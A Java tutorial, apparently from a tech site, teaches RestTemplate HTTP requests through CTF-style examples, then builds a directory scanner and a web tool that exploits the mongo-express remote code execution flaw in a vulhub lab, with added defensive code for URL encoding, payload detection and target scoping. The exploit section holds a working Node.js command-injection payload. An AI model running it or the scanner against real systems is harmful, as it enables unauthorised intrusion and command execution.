How to use java distributed based on RestTemplate

2025-04-05 Update From: SLTechnology News&Howtos, Shulou (Shulou.com) 06/01

This article introduces how to use RestTemplate in Java distributed development. It has some reference value, and interested readers can follow along; I hope you learn something from it.

1. Preface

Recently, while learning about distributed systems, I picked up some of the uses of RestTemplate. RestTemplate is commonly used to make HTTP requests. After using it, I found it very convenient, and its syntax is concise.

So I wondered whether it would be convenient to build an online "arsenal" with RestTemplate. Spring Boot development is relatively simple, and in later team collaboration, would an online platform not be more convenient for the team? It avoids the problems caused by inconsistent environments.

2. RestTemplate GET requests and passing parameters

2.1 Normal GET request without parameters

First, let's make a normal request with no parameters. To use RestTemplate, you must first instantiate it with new. The request is then made using rest.exchange.

The exchange parameters are described as follows:

| Parameter | Description |
| --- | --- |
| url | request path |
| method | request method (GET, POST, PUT, etc.) |
| requestEntity | HttpEntity object, which encapsulates the request headers and the request body |
| responseType | data type of the returned data |
| uriVariables | supports PathVariable type data |

Parameters 1 and 2 need little explanation. For parameter 3, you can pass in custom headers when initializing the HttpEntity.

So create HttpHeaders headers = new HttpHeaders() ahead of time, set the headers, and pass it in.

```java
@RequestMapping("gettest")
public @ResponseBody String param() {
    RestTemplate rest = new RestTemplate();
    HttpHeaders headers = new HttpHeaders();
    // Custom request header sent with the GET request
    headers.set("user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36");
    String url = "http://127.0.0.1/t.php";
    // No request body, only headers; the response body is read as a String
    ResponseEntity<String> res = rest.exchange(url, HttpMethod.GET, new HttpEntity<>(null, headers), String.class);
    String body = res.getBody();
    return body;
}
```

In the code above, a PHP file is requested. The PHP file is very simple: it just prints the user agent.

After the user agent is printed, the ResponseEntity res receives the echoed output, and res.getBody() returns the echoed data of the page.

2.2 GET request with parameters

Now that the no-parameter GET request is clear, let's learn how to pass parameters.

Doesn't it feel a little boring? To fix that, add a little CTF element. The code is as follows. The correct flag is output only if the parameters passed by the user satisfy the if condition on the fourth line.

Parameter passing method:

This is one of the most common approaches: receive the values as method parameters. It looks very similar to the code in the no-parameter GET example above. The parameters agent and value below are the parameter names on the web page (PS: anyone who has studied Spring Boot should know this). After that, agent is set into headers, and value is appended to t.php?value= and passed as the parameter value.

```java
public @ResponseBody String param(String agent, String value) {
    RestTemplate rest = new RestTemplate();
    HttpHeaders headers = new HttpHeaders();
    // agent comes from the request parameter and is sent as the User-Agent header
    headers.set("user-agent", agent);
    // value is concatenated into the query string as-is
    String url = "http://127.0.0.1/t.php?value=" + value;
    ResponseEntity<String> res = rest.exchange(url, HttpMethod.GET, new HttpEntity<>(null, headers), String.class);
    String body = res.getBody();
    return body;
}
```

Finally, run a test: the parameters are passed successfully and the "flag" is returned.
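The concatenation in section 2.2 puts the raw value into the URL text, so characters such as & or # change which parameters t.php receives. The sketch below is an added example, not code from the original article: it compares that concatenation with Spring's UriComponentsBuilder, and the class name, the paramNames helper and the sample values are constructed for illustration.

```java
import java.net.URI;
import java.util.ArrayList;
import java.util.List;
import org.springframework.web.util.UriComponentsBuilder;

public class QueryParamEncoding {
    static final String BASE = "http://127.0.0.1/t.php";

    // As in section 2.2: the raw value becomes part of the URL text.
    static URI concatenated(String value) {
        return URI.create(BASE + "?value=" + value);
    }

    // The value is bound to a template variable and strictly percent-encoded,
    // so it can only ever be the content of the "value" parameter.
    static URI encoded(String value) {
        return UriComponentsBuilder.fromUriString(BASE)
                .queryParam("value", "{value}")
                .encode()
                .buildAndExpand(value)
                .toUri();
    }

    // Parameter names the receiving side would see in the query string.
    static List<String> paramNames(URI uri) {
        List<String> names = new ArrayList<>();
        String query = uri.getRawQuery();
        if (query == null) return names;
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            names.add(eq < 0 ? pair : pair.substring(0, eq));
        }
        return names;
    }

    public static void main(String[] args) {
        // Constructed sample inputs for the "value" request parameter.
        for (String value : new String[] {"test", "a&debug=1", "x#frag"}) {
            URI raw = concatenated(value);
            URI safe = encoded(value);
            System.out.println(value + " -> concatenated " + raw + " " + paramNames(raw));
            System.out.println(value + " -> encoded      " + safe + " " + paramNames(safe));
        }
        // Pass the URI object, not a String, to rest.exchange(...) so that
        // RestTemplate sends it as built instead of treating it as a template.
    }
}
```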

2.3 Writing an online directory scan script

Now that we have played with GET requests, let's build a small directory scanning function. After all, what you learn should be put into practice.

The overall implementation uses Spring Boot and integrates MyBatis. The Service layer is not written here, because this is only a preliminary implementation.

One of the most obvious advantages is that the site directory names are stored in the database, which avoids the problem of missing or insufficient dictionaries later on, because team members can store their own dictionaries in the database.

First, prepare the database and some "dictionaries". In the test phase, I added several entries manually. Later, if the dictionary is large, you can write a small script to import it into the database.

Once the database is ready, you can integrate MyBatis. The pom file needs to declare the MyBatis and MySQL dependencies.

The directory structure is as follows: a Controller, a mapper with its XML configuration file, and a class for storing the data.

The application main configuration file is mainly used for the database configuration:

```properties
server.port=8081
spring.datasource.username=root
spring.datasource.password=root
spring.datasource.url=jdbc:mysql://localhost:3306/tance?useSSL=false&useUnicode=true&characterEncoding=utf-8
mybatis.mapper-locations=classpath:Mapper/*.xml
```

The Mapper code is as follows; remember to add the @Mapper annotation.

```java
@Mapper
public interface MuluMapper {
    // Returns every row of the catalogue table (the "dictionary")
    List<catalogue> selectAll();
}
```

Mapper.xml configuration, used to query the "dictionaries" in the database:

```sql
select * from catalogue
```

Now that everything is configured, it is time to implement the important part. The code is simple: first, the mapper is injected automatically through @Autowired.

Then List<catalogue> list = muluMapper.selectAll();

The select statement in mapper.xml is executed and the result is saved to the List collection. Finally, the for loop iterates over the list, concatenates the url with the contents of the name field read from the database, and saves the result to the temporary variable temp.

For example:

The user enters url as http://127.0.0.1

The first content of the name field is: admin

So eventually temp = http://127.0.0.1/admin

After the concatenation, the URL is requested through exchange, and res.getStatusCodeValue() returns the response code; a 200 is taken to mean that the file exists. (PS: the check here is rather sloppy; for example, the 403 case is not handled.)

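```java
import java.util.ArrayList;
import java.util.List;

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.HttpMethod;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.client.RestTemplate;

@RestController
public class MapperController {
    @Autowired
    MuluMapper muluMapper;

    @RequestMapping("/tance")
    public String tance(String url) {
        RestTemplate rest = new RestTemplate();
        HttpHeaders headers = new HttpHeaders();
        List<String> lists = new ArrayList<>();
        headers.set("user-agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 1011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36");
        // Load the dictionary entries from the database
        List<catalogue> list = muluMapper.selectAll();
        if (!url.endsWith("/")) {
            url += "/";
        }
        for (catalogue tance : list) {
            String temp = url + tance.getName();
            try {
                ResponseEntity<String> res = rest.exchange(temp, HttpMethod.GET, new HttpEntity<>(null, headers), String.class);
                lists.add("directory exists:" + temp + " response status code is:" + res.getStatusCodeValue());
            } catch (Exception e) {
                // RestTemplate throws on 4xx/5xx responses, so those paths end up here and are not reported
                e.printStackTrace();
            }
        }
        return lists.toString();
    }
}
```

Take a look at the finished product: a simple online web directory scan is implemented successfully.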

3. RestTemplate POST request

3.1 Playing with POST requests

With the ideas above in mind, POST is similar. So, to keep things from getting boring, let's continue with this "CTF".

The PHP code has not changed much, except that the request is changed to POST.

The RestTemplate code is as follows. The parameter agent is set into headers, and value is added to a LinkedMultiValueMap, which can be understood as the container for the data to be submitted by POST. The one slight difference at the end is that restTemplate.postForEntity() is used to submit the data by POST; otherwise it is very similar to GET.

```java
@RequestMapping("/Post01")
public @ResponseBody String Post01(String agent, String value) {
    RestTemplate restTemplate = new RestTemplate();
    HttpHeaders headers = new HttpHeaders();
    headers.set("user-agent", agent);
    String url = "http://127.0.0.1/t.php";
    // Form fields to submit in the POST body
    LinkedMultiValueMap<String, String> params = new LinkedMultiValueMap<>();
    params.add("value", value);
    ResponseEntity<String> str = restTemplate.postForEntity(url, new HttpEntity<>(params, headers), String.class);
    return str.getBody();
}
```

Finally, pass the parameters and, ding, the "flag" appears.

3.2 Scripting the mongo-express remote code execution vulnerability

The lab environment can be downloaded directly from vulhub. The installation process is simple, after startup

The exploit process is relatively simple: enter the command to be executed in execSync. A response of Valid indicates that the execution succeeded.

After that, check the Docker container and you will find that 1.txt has been created successfully.

Next, write the exploit script.

First prepare an ugly front-end page and store it in the static directory, which is where Spring Boot stores static resources by default.

mongo-express remote code execution vulnerability
Please enter the vulnerable URL:
Please enter the command to be executed:

Controller design: the form's action submits to exec, so the RequestMapping can be written as exec, with two parameters: url to receive the URL address and command to receive the command.

The complete Controller is shown below; let's analyze it further. In the paramMap.add statement, you can see that the input command is concatenated in. Assuming the input is "ls", the following data is formed:

document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ls")

Finally, the POST is submitted using the exchange method. The URL is the one passed in by the user, and after the command is passed in and concatenated, the data is stored in the httpEntity. The parameters are not explained further here, because with the earlier sections as a foundation you should be able to understand what they mean.

```java
@RequestMapping("/exec")
public @ResponseBody String Post01(String url, String command) {
    RestTemplate restTemplate = new RestTemplate();
    HttpHeaders headers = new HttpHeaders();
    headers.set("user-agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)");
    MultiValueMap<String, String> paramMap = new LinkedMultiValueMap<>();
    // The user-supplied command is concatenated into the document form field
    paramMap.add("document", "this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(" + "\"" + command + "\"" + ")");
    HttpEntity<MultiValueMap<String, String>> httpEntity = new HttpEntity<>(paramMap, headers);
    ResponseEntity<String> response = null;
    try {
        response = restTemplate.exchange(url, HttpMethod.POST, httpEntity, String.class);
    } catch (NullPointerException e) {
        e.printStackTrace();
    }
    return response.getBody();
}
```
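For operators of a mongo-express instance, the document field built above is a usable detection signal. The following is an added example, not code from the original article: it inspects form-encoded request bodies for the markers of that payload, assuming the bodies are available from a reverse proxy or WAF log; the class name, marker names and sample bodies are constructed.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

public class DocumentFieldDetector {
    // Markers taken from the payload shown in section 3.2 (whitespace-tolerant).
    private static final Map<String, Pattern> MARKERS = new LinkedHashMap<>();
    static {
        MARKERS.put("constructor-chain", Pattern.compile("constructor\\s*\\.\\s*constructor"));
        MARKERS.put("mainModule-require", Pattern.compile("mainModule\\s*\\.\\s*require"));
        MARKERS.put("child_process", Pattern.compile("child_process"));
        MARKERS.put("execSync", Pattern.compile("execSync\\s*\\("));
    }

    // Percent-decodes a form component; malformed input is inspected as-is.
    static String decode(String s) {
        try {
            return URLDecoder.decode(s, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return s;
        }
    }

    /** Returns the markers found in the "document" field of a form-encoded body. */
    static List<String> inspect(String formBody) {
        List<String> hits = new ArrayList<>();
        for (String pair : formBody.split("&")) {
            int eq = pair.indexOf('=');
            if (eq < 0 || !decode(pair.substring(0, eq)).equals("document")) continue;
            String value = decode(pair.substring(eq + 1));
            MARKERS.forEach((name, p) -> { if (p.matcher(value).find()) hits.add(name); });
        }
        return hits;
    }

    public static void main(String[] args) {
        String[] bodies = {   // constructed sample request bodies
            "document=this.constructor.constructor(%22return+process%22)().mainModule.require(%22child_process%22).execSync(%22ls%22)",
            "document=%7B%22name%22%3A%22alice%22%7D",
            "db=test&collection=users"
        };
        for (String body : bodies) {
            List<String> hits = inspect(body);
            System.out.println((hits.isEmpty() ? "ok    " : "ALERT ") + hits + "  " + body);
        }
    }
}
```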

Finally, test it: the script exploits the vulnerability successfully.
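Both the /tance endpoint in section 2.3 and the /exec endpoint above request whatever url the caller supplies, so a shared team deployment needs a scope check in front of them. This is an added example, not code from the original article: the class name and the allowed hosts and ports are assumptions standing in for the team's authorized test scope, and the sample inputs are constructed.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.List;
import java.util.Locale;
import java.util.Optional;
import java.util.Set;

public class TargetScope {
    // Assumption: hosts and ports the team is authorized to test (constructed values).
    private static final Set<String> ALLOWED_HOSTS = Set.of("127.0.0.1", "lab.internal.example");
    private static final Set<Integer> ALLOWED_PORTS = Set.of(80, 443, 8081);

    /** Returns the parsed URI if it is inside the authorized scope, otherwise empty. */
    static Optional<URI> authorize(String raw) {
        if (raw == null) return Optional.empty();
        URI uri;
        try {
            uri = new URI(raw.trim()).normalize();
        } catch (URISyntaxException e) {
            return Optional.empty();
        }
        String scheme = uri.getScheme();
        String host = uri.getHost();
        if (scheme == null || host == null) return Optional.empty();
        scheme = scheme.toLowerCase(Locale.ROOT);
        if (!scheme.equals("http") && !scheme.equals("https")) return Optional.empty();
        // "http://127.0.0.1@other.example/" parses as userinfo=127.0.0.1, host=other.example
        if (uri.getRawUserInfo() != null) return Optional.empty();
        int port = uri.getPort() != -1 ? uri.getPort() : (scheme.equals("https") ? 443 : 80);
        boolean inScope = ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))
                && ALLOWED_PORTS.contains(port);
        return inScope ? Optional.of(uri) : Optional.empty();
    }

    public static void main(String[] args) {
        List<String> samples = List.of(   // constructed inputs for the url parameter
            "http://127.0.0.1/",
            "http://127.0.0.1:8081/admin",
            "http://127.0.0.1@other.example/",
            "http://127.0.0.1.other.example/",
            "http://169.254.169.254/latest/meta-data/",
            "file:///etc/passwd");
        for (String s : samples) {
            System.out.println((authorize(s).isPresent() ? "ALLOW " : "DENY  ") + s);
        }
    }
}
```

Pass the returned URI object, not the original string, to rest.exchange so the request goes to exactly what was validated. RestTemplate's default request factory follows redirects on GET, so an in-scope host can still send the request elsewhere unless redirects are disabled.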
